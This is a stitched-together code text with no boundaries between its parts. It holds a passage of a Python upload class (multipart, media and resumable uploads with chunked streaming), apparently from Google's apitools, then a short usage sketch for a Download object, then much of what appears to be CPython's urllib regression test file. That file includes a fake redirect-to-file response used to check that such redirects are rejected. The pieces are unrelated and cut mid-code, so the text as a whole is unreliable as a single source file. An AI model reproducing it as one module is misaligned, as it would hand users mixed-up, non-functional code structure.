http_request) if self.strategy == SIMPLE_UPLOAD: url_builder.relative_path = upload_config.simple_path if http_request.body: url_builder.query_params['uploadType'] = 'multipart' self.__ConfigureMultipartRequest(http_request) else: url_builder.query_params['uploadType'] = 'media' self.__ConfigureMediaRequest(http_request) else: url_builder.relative_path = upload_config.resumable_path url_builder.query_params['uploadType'] = 'resumable' self.__ConfigureResumableRequest(http_request) def __ConfigureMediaRequest(self, http_request): """Configure http_request as a simple request for this upload.""" http_request.headers['content-type'] = self.mime_type http_request.body = self.stream.read() http_request.loggable_body = '<media body>' def __ConfigureMultipartRequest(self, http_request): """Configure http_request as a multipart request for this upload.""" # This is a multipart/related upload. msg_root = mime_multipart.MIMEMultipart('related') # msg_root should not write out its own headers setattr(msg_root, '_write_headers', lambda self: None) # attach the body as one part msg = mime_nonmultipart.MIMENonMultipart( *http_request.headers['content-type'].split('/')) msg.set_payload(http_request.body) msg_root.attach(msg) # attach the media as the second part msg = mime_nonmultipart.MIMENonMultipart(*self.mime_type.split('/')) msg['Content-Transfer-Encoding'] = 'binary' msg.set_payload(self.stream.read()) msg_root.attach(msg) # NOTE: We encode the body, but can't use # `email.message.Message.as_string` because it prepends # `> ` to `From ` lines. 
fp = six.BytesIO() if six.PY3: generator_class = email_generator.BytesGenerator else: generator_class = email_generator.Generator g = generator_class(fp, mangle_from_=False) g.flatten(msg_root, unixfrom=False) http_request.body = fp.getvalue() multipart_boundary = msg_root.get_boundary() http_request.headers['content-type'] = ( 'multipart/related; boundary=%r' % multipart_boundary) if isinstance(multipart_boundary, six.text_type): multipart_boundary = multipart_boundary.encode('ascii') body_components = http_request.body.split(multipart_boundary) headers, _, _ = body_components[-2].partition(b'\n\n') body_components[-2] = b'\n\n'.join([headers, b'<media body>\n\n--']) http_request.loggable_body = multipart_boundary.join(body_components) def __ConfigureResumableRequest(self, http_request): http_request.headers['X-Upload-Content-Type'] = self.mime_type if self.total_size is not None: http_request.headers[ 'X-Upload-Content-Length'] = str(self.total_size) def RefreshResumableUploadState(self): """Talk to the server and refresh the state of this resumable upload. Returns: Response if the upload is complete. """ if self.strategy != RESUMABLE_UPLOAD: return self.EnsureInitialized() refresh_request = http_wrapper.Request( url=self.url, http_method='PUT', headers={'Content-Range': 'bytes */*'}) refresh_response = http_wrapper.MakeRequest( self.http, refresh_request, redirections=0, retries=self.num_retries) range_header = self._GetRangeHeaderFromResponse(refresh_response) if refresh_response.status_code in (http_client.OK, http_client.CREATED): self.__complete = True self.__progress = self.total_size self.stream.seek(self.progress) # If we're finished, the refresh response will contain the metadata # originally requested. Cache it so it can be returned in # StreamInChunks. self.__final_response = refresh_response elif refresh_response.status_code == http_wrapper.RESUME_INCOMPLETE: if range_header is None: self.__progress = 0 else: self.__progress = self.__GetLastByte(range_header) + 1 self.stream.seek(self.progress) else: raise exceptions.HttpError.FromResponse(refresh_response) def _GetRangeHeaderFromResponse(self, response): return response.info.get('Range', response.info.get('range')) def InitializeUpload(self, http_request, http=None, client=None): """Initialize this upload from the given http_request.""" if self.strategy is None: raise exceptions.UserError( 'No upload strategy set; did you call ConfigureRequest?') if http is None and client is None: raise exceptions.UserError('Must provide client or http.') if self.strategy != RESUMABLE_UPLOAD: return http = http or client.http if client is not None: http_request.url = client.FinalizeTransferUrl(http_request.url) self.EnsureUninitialized() http_response = http_wrapper.MakeRequest(http, http_request, retries=self.num_retries) if http_response.status_code != http_client.OK: raise exceptions.HttpError.FromResponse(http_response) self.__server_chunk_granularity = http_response.info.get( 'X-Goog-Upload-Chunk-Granularity') url = http_response.info['location'] if client is not None: url = client.FinalizeTransferUrl(url) self._Initialize(http, url) # Unless the user has requested otherwise, we want to just # go ahead and pump the bytes now. if self.auto_transfer: return self.StreamInChunks() return http_response def __GetLastByte(self, range_header): _, _, end = range_header.partition('-') # TODO(craigcitro): Validate start == 0? 
return int(end) def __ValidateChunksize(self, chunksize=None): if self.__server_chunk_granularity is None: return chunksize = chunksize or self.chunksize if chunksize % self.__server_chunk_granularity: raise exceptions.ConfigurationValueError( 'Server requires chunksize to be a multiple of %d', self.__server_chunk_granularity) def __StreamMedia(self, callback=None, finish_callback=None, additional_headers=None, use_chunks=True): """Helper function for StreamMedia / StreamInChunks.""" if self.strategy != RESUMABLE_UPLOAD: raise exceptions.InvalidUserInputError( 'Cannot stream non-resumable upload') callback = callback or self.progress_callback finish_callback = finish_callback or self.finish_callback # final_response is set if we resumed an already-completed upload. response = self.__final_response send_func = self.__SendChunk if use_chunks else self.__SendMediaBody if use_chunks: self.__ValidateChunksize(self.chunksize) self.EnsureInitialized() while not self.complete: response = send_func(self.stream.tell(), additional_headers=additional_headers) if response.status_code in (http_client.OK, http_client.CREATED): self.__complete = True break self.__progress = self.__GetLastByte(response.info['range']) if self.progress + 1 != self.stream.tell(): # TODO(craigcitro): Add a better way to recover here. raise exceptions.CommunicationError( 'Failed to transfer all bytes in chunk, upload paused at ' 'byte %d' % self.progress) self._ExecuteCallback(callback, response) if self.__complete and hasattr(self.stream, 'seek'): current_pos = self.stream.tell() self.stream.seek(0, os.SEEK_END) end_pos = self.stream.tell() self.stream.seek(current_pos) if current_pos != end_pos: raise exceptions.TransferInvalidError( 'Upload complete with %s additional bytes left in stream' % (int(end_pos) - int(current_pos))) self._ExecuteCallback(finish_callback, response) return response def StreamMedia(self, callback=None, finish_callback=None, additional_headers=None): """Send this resumable upload in a single request. Args: callback: Progress callback function with inputs (http_wrapper.Response, transfer.Upload) finish_callback: Final callback function with inputs (http_wrapper.Response, transfer.Upload) additional_headers: Dict of headers to include with the upload http_wrapper.Request. Returns: http_wrapper.Response of final response. """ return self.__StreamMedia( callback=callback, finish_callback=finish_callback, additional_headers=additional_headers, use_chunks=False) def StreamInChunks(self, callback=None, finish_callback=None, additional_headers=None): """Send this (resumable) upload in chunks.""" return self.__StreamMedia( callback=callback, finish_callback=finish_callback, additional_headers=additional_headers) def __SendMediaRequest(self, request, end): """Request helper function for SendMediaBody & SendChunk.""" response = http_wrapper.MakeRequest( self.bytes_http, request, retry_func=self.retry_func, retries=self.num_retries) if response.status_code not in (http_client.OK, http_client.CREATED, http_wrapper.RESUME_INCOMPLETE): # We want to reset our state to wherever the server left us # before this failed request, and then raise. 
self.RefreshResumableUploadState() raise exceptions.HttpError.FromResponse(response) if response.status_code == http_wrapper.RESUME_INCOMPLETE: last_byte = self.__GetLastByte( self._GetRangeHeaderFromResponse(response)) if last_byte + 1 != end: self.stream.seek(last_byte) return response def __SendMediaBody(self, start, additional_headers=None): """Send the entire media stream in a single request.""" self.EnsureInitialized() if self.total_size is None: raise exceptions.TransferInvalidError( 'Total size must be known for SendMediaBody') body_stream = stream_slice.StreamSlice( self.stream, self.total_size - start) request = http_wrapper.Request(url=self.url, http_method='PUT', body=body_stream) request.headers['Content-Type'] = self.mime_type if start == self.total_size: # End of an upload with 0 bytes left to send; just finalize. range_string = 'bytes */%s' % self.total_size else: range_string = 'bytes %s-%s/%s' % (start, self.total_size - 1, self.total_size) request.headers['Content-Range'] = range_string if additional_headers: request.headers.update(additional_headers) return self.__SendMediaRequest(request, self.total_size) def __SendChunk(self, start, additional_headers=None): """Send the specified chunk.""" self.EnsureInitialized() no_log_body = self.total_size is None if self.total_size is None: # For the streaming resumable case, we need to detect when # we're at the end of the stream. body_stream = buffered_stream.BufferedStream( self.stream, start, self.chunksize) end = body_stream.stream_end_position if body_stream.stream_exhausted: self.__total_size = end # TODO: Here, change body_stream from a stream to a string object, # which means reading a chunk into memory. This works around # https://code.google.com/p/httplib2/issues/detail?id=176 which can # cause httplib2 to skip bytes on 401's for file objects. # Rework this solution to be more general. body_stream = body_stream.read(self.chunksize) else: end = min(start + self.chunksize, self.total_size) body_stream = stream_slice.StreamSlice(self.stream, end - start) # TODO(craigcitro): Think about clearer errors on "no data in # stream". request = http_wrapper.Request(url=self.url, http_method='PUT', body=body_stream) request.headers['Content-Type'] = self.mime_type if no_log_body: # Disable logging of streaming body. # TODO: Remove no_log_body and rework as part of a larger logs # refactor. request.loggable_body = '<media body>' if self.total_size is None: # Streaming resumable upload case, unknown total size. range_string = 'bytes %s-%s/*' % (start, end - 1) elif end == start: # End of an upload with 0 bytes left to send; just finalize. range_string = 'bytes */%s' % self.total_size else: # Normal resumable upload case with known sizes. range_string = 'bytes %s-%s/%s' % (start, end - 1, self.total_size) request.headers['Content-Range'] = range_string if additional_headers: request.headers.update(additional_headers) return self.__SendMediaRequest(request, end)
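A hedged sketch of how a Download from this module is typically used (the filename and the generated-client call are hypothetical; in practice an apitools-generated client calls ConfigureRequest/InitializeDownload on your behalf when a download object is passed to one of its methods):

from apitools.base.py import transfer

# Stream to a local file; overwrite=True replaces any existing file, and
# auto_transfer=False defers byte transfer until we ask for it.
download = transfer.Download.FromFile('object.bin', overwrite=True,
                                      auto_transfer=False)
# A generated client method would then be invoked roughly like:
#     client.objects.Get(request, download=download)
# after which the bytes can be pulled chunk by chunk with progress callbacks:
#     download.StreamInChunks(callback=transfer.DownloadProgressPrinter,
#                             finish_callback=transfer.DownloadCompletePrinter)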
test_urllib.py
"""Regression tests for what was in Python 2's "urllib" module""" import urllib.parse import urllib.request import urllib.error import http.client import email.message import io import unittest from unittest.mock import patch from test import support import os try: import ssl except ImportError: ssl = None import sys import tempfile from nturl2path import url2pathname, pathname2url from base64 import b64encode import collections def hexescape(char): """Escape char as RFC 2396 specifies""" hex_repr = hex(ord(char))[2:].upper() if len(hex_repr) == 1: hex_repr = "0%s" % hex_repr return "%" + hex_repr # Shortcut for testing FancyURLopener _urlopener = None def urlopen(url, data=None, proxies=None): """urlopen(url [, data]) -> open file-like object""" global _urlopener if proxies is not None: opener = urllib.request.FancyURLopener(proxies=proxies) elif not _urlopener: opener = FancyURLopener() _urlopener = opener else: opener = _urlopener if data is None: return opener.open(url) else: return opener.open(url, data) def FancyURLopener(): with support.check_warnings( ('FancyURLopener style of invoking requests is deprecated.', DeprecationWarning)): return urllib.request.FancyURLopener() def fakehttp(fakedata): class FakeSocket(io.BytesIO): io_refs = 1 def sendall(self, data): FakeHTTPConnection.buf = data def makefile(self, *args, **kwds): self.io_refs += 1 return self def read(self, amt=None): if self.closed: return b"" return io.BytesIO.read(self, amt) def readline(self, length=None): if self.closed: return b"" return io.BytesIO.readline(self, length) def close(self): self.io_refs -= 1 if self.io_refs == 0: io.BytesIO.close(self) class FakeHTTPConnection(http.client.HTTPConnection): # buffer to store data for verification in urlopen tests. buf = None def connect(self): self.sock = FakeSocket(self.fakedata) type(self).fakesock = self.sock FakeHTTPConnection.fakedata = fakedata return FakeHTTPConnection class FakeHTTPMixin(object): def fakehttp(self, fakedata): self._connection_class = http.client.HTTPConnection http.client.HTTPConnection = fakehttp(fakedata) def unfakehttp(self): http.client.HTTPConnection = self._connection_class class FakeFTPMixin(object): def fakeftp(self): class FakeFtpWrapper(object): def __init__(self, user, passwd, host, port, dirs, timeout=None, persistent=True): pass def retrfile(self, file, type): return io.BytesIO(), 0 def close(self): pass self._ftpwrapper_class = urllib.request.ftpwrapper urllib.request.ftpwrapper = FakeFtpWrapper def unfakeftp(self): urllib.request.ftpwrapper = self._ftpwrapper_class class urlopen_FileTests(unittest.TestCase): """Test urlopen() opening a temporary file. Try to test as much functionality as possible so as to cut down on reliance on connecting to the Net for testing. 
""" def setUp(self): # Create a temp file to use for testing self.text = bytes("test_urllib: %s\n" % self.__class__.__name__, "ascii") f = open(support.TESTFN, 'wb') try: f.write(self.text) finally: f.close() self.pathname = support.TESTFN self.returned_obj = urlopen("file:%s" % self.pathname) def tearDown(self): """Shut down the open object""" self.returned_obj.close() os.remove(support.TESTFN) def test_interface(self): # Make sure object returned by urlopen() has the specified methods for attr in ("read", "readline", "readlines", "fileno", "close", "info", "geturl", "getcode", "__iter__"): self.assertTrue(hasattr(self.returned_obj, attr), "object returned by urlopen() lacks %s attribute" % attr) def test_read(self): self.assertEqual(self.text, self.returned_obj.read()) def test_readline(self): self.assertEqual(self.text, self.returned_obj.readline()) self.assertEqual(b'', self.returned_obj.readline(), "calling readline() after exhausting the file did not" " return an empty string") def test_readlines(self): lines_list = self.returned_obj.readlines() self.assertEqual(len(lines_list), 1, "readlines() returned the wrong number of lines") self.assertEqual(lines_list[0], self.text, "readlines() returned improper text") def test_fileno(self): file_num = self.returned_obj.fileno() self.assertIsInstance(file_num, int, "fileno() did not return an int") self.assertEqual(os.read(file_num, len(self.text)), self.text, "Reading on the file descriptor returned by fileno() " "did not return the expected text") def test_close(self): # Test close() by calling it here and then having it be called again # by the tearDown() method for the test self.returned_obj.close() def test_info(self): self.assertIsInstance(self.returned_obj.info(), email.message.Message) def test_geturl(self): self.assertEqual(self.returned_obj.geturl(), self.pathname) def test_getcode(self): self.assertIsNone(self.returned_obj.getcode()) def test_iter(self): # Test iterator # Don't need to count number of iterations since test would fail the # instant it returned anything beyond the first line from the # comparison. # Use the iterator in the usual implicit way to test for ticket #4608. for line in self.returned_obj: self.assertEqual(line, self.text) def test_relativelocalfile(self): self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname) class ProxyTests(unittest.TestCase): def setUp(self): # Records changes to env vars self.env = support.EnvironmentVarGuard() # Delete all proxy related env vars for k in list(os.environ): if 'proxy' in k.lower(): self.env.unset(k) def tearDown(self): # Restore all proxy related env vars self.env.__exit__() del self.env def test_getproxies_environment_keep_no_proxies(self): self.env.set('NO_PROXY', 'localhost') proxies = urllib.request.getproxies_environment() # getproxies_environment use lowered case truncated (no '_proxy') keys self.assertEqual('localhost', proxies['no']) # List of no_proxies with space. 
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234') self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com')) self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com:8888')) self.assertTrue(urllib.request.proxy_bypass_environment('newdomain.com:1234')) def test_proxy_cgi_ignore(self): try: self.env.set('HTTP_PROXY', 'http://somewhere:3128') proxies = urllib.request.getproxies_environment() self.assertEqual('http://somewhere:3128', proxies['http']) self.env.set('REQUEST_METHOD', 'GET') proxies = urllib.request.getproxies_environment() self.assertNotIn('http', proxies) finally: self.env.unset('REQUEST_METHOD') self.env.unset('HTTP_PROXY') def test_proxy_bypass_environment_host_match(self): bypass = urllib.request.proxy_bypass_environment self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t') self.assertTrue(bypass('localhost')) self.assertTrue(bypass('LocalHost')) # MixedCase self.assertTrue(bypass('LOCALHOST')) # UPPERCASE self.assertTrue(bypass('newdomain.com:1234')) self.assertTrue(bypass('foo.d.o.t')) # issue 29142 self.assertTrue(bypass('anotherdomain.com:8888')) self.assertTrue(bypass('www.newdomain.com:1234')) self.assertFalse(bypass('prelocalhost')) self.assertFalse(bypass('newdomain.com')) # no port self.assertFalse(bypass('newdomain.com:1235')) # wrong port class ProxyTests_withOrderedEnv(unittest.TestCase): def setUp(self): # We need to test conditions, where variable order _is_ significant self._saved_env = os.environ # Monkey patch os.environ, start with empty fake environment os.environ = collections.OrderedDict() def tearDown(self): os.environ = self._saved_env def test_getproxies_environment_prefer_lowercase(self): # Test lowercase preference with removal os.environ['no_proxy'] = '' os.environ['No_Proxy'] = 'localhost' self.assertFalse(urllib.request.proxy_bypass_environment('localhost')) self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary')) os.environ['http_proxy'] = '' os.environ['HTTP_PROXY'] = 'http://somewhere:3128' proxies = urllib.request.getproxies_environment() self.assertEqual({}, proxies) # Test lowercase preference of proxy bypass and correct matching including ports os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234' os.environ['No_Proxy'] = 'xyz.com' self.assertTrue(urllib.request.proxy_bypass_environment('localhost')) self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678')) self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234')) self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy')) self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary')) # Test lowercase preference with replacement os.environ['http_proxy'] = 'http://somewhere:3128' os.environ['Http_Proxy'] = 'http://somewhereelse:3128' proxies = urllib.request.getproxies_environment() self.assertEqual('http://somewhere:3128', proxies['http']) class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin): """Test urlopen() opening a fake http connection.""" def check_read(self, ver): self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!") try: fp = urlopen("http://python.org/") self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") self.assertEqual(fp.geturl(), 'http://python.org/') self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_url_fragment(self): # Issue #11703: geturl() omits fragments in the original URL. 
url = 'http://docs.python.org/library/urllib.html#OK' self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!") try: fp = urllib.request.urlopen(url) self.assertEqual(fp.geturl(), url) finally: self.unfakehttp() def test_willclose(self): self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!") try: resp = urlopen("http://www.python.org") self.assertTrue(resp.fp.will_close) finally: self.unfakehttp() def test_read_0_9(self): # "0.9" response accepted (but not "simple responses" without # a status line) self.check_read(b"0.9") def test_read_1_0(self): self.check_read(b"1.0") def test_read_1_1(self): self.check_read(b"1.1") def test_read_bogus(self): # urlopen() should raise OSError for many error codes. self.fakehttp(b'''HTTP/1.1 401 Authentication Required Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Type: text/html; charset=iso-8859-1 ''') try: self.assertRaises(OSError, urlopen, "http://python.org/") finally: self.unfakehttp() def test_invalid_redirect(self): # urlopen() should raise OSError for many error codes. self.fakehttp(b'''HTTP/1.1 302 Found Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Location: file://guidocomputer.athome.com:/python/license Connection: close Content-Type: text/html; charset=iso-8859-1 ''') try: msg = "Redirection to url 'file:" with self.assertRaisesRegex(urllib.error.HTTPError, msg): urlopen("http://python.org/") finally: self.unfakehttp() def test_redirect_limit_independent(self): # Ticket #12923: make sure independent requests each use their # own retry limit. for i in range(FancyURLopener().maxtries): self.fakehttp(b'''HTTP/1.1 302 Found Location: file://guidocomputer.athome.com:/python/license Connection: close ''') try: self.assertRaises(urllib.error.HTTPError, urlopen, "http://something") finally: self.unfakehttp() def test_empty_socket(self): # urlopen() raises OSError if the underlying socket does not send any # data. 
(#1680230) self.fakehttp(b'') try: self.assertRaises(OSError, urlopen, "http://something") finally: self.unfakehttp() def test_missing_localfile(self): # Test for #10836 with self.assertRaises(urllib.error.URLError) as e: urlopen('file://localhost/a/file/which/doesnot/exists.py') self.assertTrue(e.exception.filename) self.assertTrue(e.exception.reason) def test_file_notexists(self): fd, tmp_file = tempfile.mkstemp() tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/') try: self.assertTrue(os.path.exists(tmp_file)) with urlopen(tmp_fileurl) as fobj: self.assertTrue(fobj) finally: os.close(fd) os.unlink(tmp_file) self.assertFalse(os.path.exists(tmp_file)) with self.assertRaises(urllib.error.URLError): urlopen(tmp_fileurl) def test_ftp_nohost(self): test_ftp_url = 'ftp:///path' with self.assertRaises(urllib.error.URLError) as e: urlopen(test_ftp_url) self.assertFalse(e.exception.filename) self.assertTrue(e.exception.reason) def test_ftp_nonexisting(self): with self.assertRaises(urllib.error.URLError) as e: urlopen('ftp://localhost/a/file/which/doesnot/exists.py') self.assertFalse(e.exception.filename) self.assertTrue(e.exception.reason) @patch.object(urllib.request, 'MAXFTPCACHE', 0) def test_ftp_cache_pruning(self): self.fakeftp() try: urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, []) urlopen('ftp://localhost') finally: self.unfakeftp() def test_userpass_inurl(self): self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!") try: fp = urlopen("http://user:pass@python.org/") self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") self.assertEqual(fp.geturl(), 'http://user:pass@python.org/') self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_userpass_inurl_w_spaces(self): self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!") try: userpass = "a b:c d" url = "http://{}@python.org/".format(userpass) fakehttp_wrapper = http.client.HTTPConnection authorization = ("Authorization: Basic %s\r\n" % b64encode(userpass.encode("ASCII")).decode("ASCII")) fp = urlopen(url) # The authorization header must be in place self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8")) self.assertEqual(fp.readline(), b"Hello!") self.assertEqual(fp.readline(), b"") # the spaces are quoted in URL so no match self.assertNotEqual(fp.geturl(), url) self.assertEqual(fp.getcode(), 200) finally: self.unfakehttp() def test_URLopener_deprecation(self): with support.check_warnings(('',DeprecationWarning)): urllib.request.URLopener() @unittest.skipUnless(ssl, "ssl module required") def test_cafile_and_context(self): context = ssl.create_default_context() with support.check_warnings(('', DeprecationWarning)): with self.assertRaises(ValueError): urllib.request.urlopen( "https://localhost", cafile="/nonexistent/path", context=context ) class urlopen_DataTests(unittest.TestCase): """Test urlopen() opening a data URL.""" def setUp(self): # text containing URL special- and unicode-characters self.text = "test data URLs :;,%=& \u00f6 \u00c4 " # 2x1 pixel RGB PNG image with one black and one white pixel self.image = ( b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00' b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae' b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00' b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82') self.text_url = ( "data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3" "D%26%20%C3%B6%20%C3%84%20") self.text_url_base64 = ( 
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs" "sJT0mIPYgxCA%3D") # base64 encoded data URL that contains ignorable spaces, # such as "\n", " ", "%0A", and "%20". self.image_url = ( "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n" "QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 " "vHgAAAABJRU5ErkJggg%3D%3D%0A%20") self.text_url_resp = urllib.request.urlopen(self.text_url) self.text_url_base64_resp = urllib.request.urlopen( self.text_url_base64) self.image_url_resp = urllib.request.urlopen(self.image_url) def test_interface(self): # Make sure object returned by urlopen() has the specified methods for attr in ("read", "readline", "readlines", "close", "info", "geturl", "getcode", "__iter__"): self.assertTrue(hasattr(self.text_url_resp, attr), "object returned by urlopen() lacks %s attribute" % attr) def test_info(self): self.assertIsInstance(self.text_url_resp.info(), email.message.Message) self.assertEqual(self.text_url_base64_resp.info().get_params(), [('text/plain', ''), ('charset', 'ISO-8859-1')]) self.assertEqual(self.image_url_resp.info()['content-length'], str(len(self.image))) self.assertEqual(urllib.request.urlopen("data:,").info().get_params(), [('text/plain', ''), ('charset', 'US-ASCII')]) def test_geturl(self): self.assertEqual(self.text_url_resp.geturl(), self.text_url) self.assertEqual(self.text_url_base64_resp.geturl(), self.text_url_base64) self.assertEqual(self.image_url_resp.geturl(), self.image_url) def test_read_text(self): self.assertEqual(self.text_url_resp.read().decode( dict(self.text_url_resp.info().get_params())['charset']), self.text) def test_read_text_base64(self): self.assertEqual(self.text_url_base64_resp.read().decode( dict(self.text_url_base64_resp.info().get_params())['charset']), self.text) def test_read_image(self): self.assertEqual(self.image_url_resp.read(), self.image) def test_missing_comma(self): self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain') def test_invalid_base64_data(self): # missing padding character self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=') class urlretrieve_FileTests(unittest.TestCase): """Test urllib.urlretrieve() on local files""" def setUp(self): # Create a list of temporary files. Each item in the list is a file # name (absolute path or relative to the current working directory). # All files in this list will be deleted in the tearDown method. Note, # this only helps to makes sure temporary files get deleted, but it # does nothing about trying to close files that may still be open. It # is the responsibility of the developer to properly close files even # when exceptional conditions occur. self.tempFiles = [] # Create a temporary file. self.registerFileForCleanUp(support.TESTFN) self.text = b'testing urllib.urlretrieve' try: FILE = open(support.TESTFN, 'wb') FILE.write(self.text) FILE.close() finally: try: FILE.close() except: pass def tearDown(self): # Delete the temporary files. 
for each in self.tempFiles: try: os.remove(each) except: pass def constructLocalFileUrl(self, filePath): filePath = os.path.abspath(filePath) try: filePath.encode("utf-8") except UnicodeEncodeError: raise unittest.SkipTest("filePath is not encodable to utf8") return "file://%s" % urllib.request.pathname2url(filePath) def createNewTempFile(self, data=b""): """Creates a new temporary file containing the specified data, registers the file for deletion during the test fixture tear down, and returns the absolute path of the file.""" newFd, newFilePath = tempfile.mkstemp() try: self.registerFileForCleanUp(newFilePath) newFile = os.fdopen(newFd, "wb") newFile.write(data) newFile.close() finally: try: newFile.close() except: pass return newFilePath def registerFileForCleanUp(self, fileName): self.tempFiles.append(fileName) def test_basic(self): # Make sure that a local file just gets its own location returned and # a headers value is returned. result = urllib.request.urlretrieve("file:%s" % support.TESTFN) self.assertEqual(result[0], support.TESTFN) self.assertIsInstance(result[1], email.message.Message, "did not get an email.message.Message instance " "as second returned value") def test_copy(self): # Test that setting the filename argument works. second_temp = "%s.2" % support.TESTFN self.registerFileForCleanUp(second_temp) result = urllib.request.urlretrieve(self.constructLocalFileUrl( support.TESTFN), second_temp) self.assertEqual(second_temp, result[0]) self.assertTrue(os.path.exists(second_temp), "copy of the file was not " "made") FILE = open(second_temp, 'rb') try: text = FILE.read() FILE.close() finally: try: FILE.close() except: pass self.assertEqual(self.text, text) def test_reporthook(self): # Make sure that the reporthook works. def hooktester(block_count, block_read_size, file_size, count_holder=[0]): self.assertIsInstance(block_count, int) self.assertIsInstance(block_read_size, int) self.assertIsInstance(file_size, int) self.assertEqual(block_count, count_holder[0]) count_holder[0] = count_holder[0] + 1 second_temp = "%s.2" % support.TESTFN self.registerFileForCleanUp(second_temp) urllib.request.urlretrieve( self.constructLocalFileUrl(support.TESTFN), second_temp, hooktester) def test_reporthook_0_bytes(self): # Test on zero length file. Should call reporthook only 1 time. report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile() urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 1) self.assertEqual(report[0][2], 0) def test_reporthook_5_bytes(self): # Test on 5 byte file. Should call reporthook only 2 times (once when # the "network connection" is established and once when the block is # read). report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile(b"x" * 5) urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 2) self.assertEqual(report[0][2], 5) self.assertEqual(report[1][2], 5) def test_reporthook_8193_bytes(self): # Test on 8193 byte file. Should call reporthook only 3 times (once # when the "network connection" is established, once for the next 8192 # bytes, and once for the last byte). 
report = [] def hooktester(block_count, block_read_size, file_size, _report=report): _report.append((block_count, block_read_size, file_size)) srcFileName = self.createNewTempFile(b"x" * 8193) urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName), support.TESTFN, hooktester) self.assertEqual(len(report), 3) self.assertEqual(report[0][2], 8193) self.assertEqual(report[0][1], 8192) self.assertEqual(report[1][1], 8192) self.assertEqual(report[2][1], 8192) class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin): """Test urllib.urlretrieve() using fake http connections""" def test_short_content_raises_ContentTooShortError(self): self.fakehttp(b'''HTTP/1.1 200 OK Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Length: 100 Content-Type: text/html; charset=iso-8859-1 FF ''') def _reporthook(par1, par2, par3): pass with self.assertRaises(urllib.error.ContentTooShortError): try: urllib.request.urlretrieve(support.TEST_HTTP_URL, reporthook=_reporthook) finally: self.unfakehttp() def test_short_content_raises_ContentTooShortError_without_reporthook(self): self.fakehttp(b'''HTTP/1.1 200 OK Date: Wed, 02 Jan 2008 03:03:54 GMT Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e Connection: close Content-Length: 100 Content-Type: text/html; charset=iso-8859-1 FF ''') with self.assertRaises(urllib.error.ContentTooShortError): try: urllib.request.urlretrieve(support.TEST_HTTP_URL) finally: self.unfakehttp() class QuotingTests(unittest.TestCase): r"""Tests for urllib.quote() and urllib.quote_plus() According to RFC 3986 (Uniform Resource Identifiers), to escape a character you write it as '%' + <2 character US-ASCII hex value>. The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly. Case does not matter on the hex letters. 
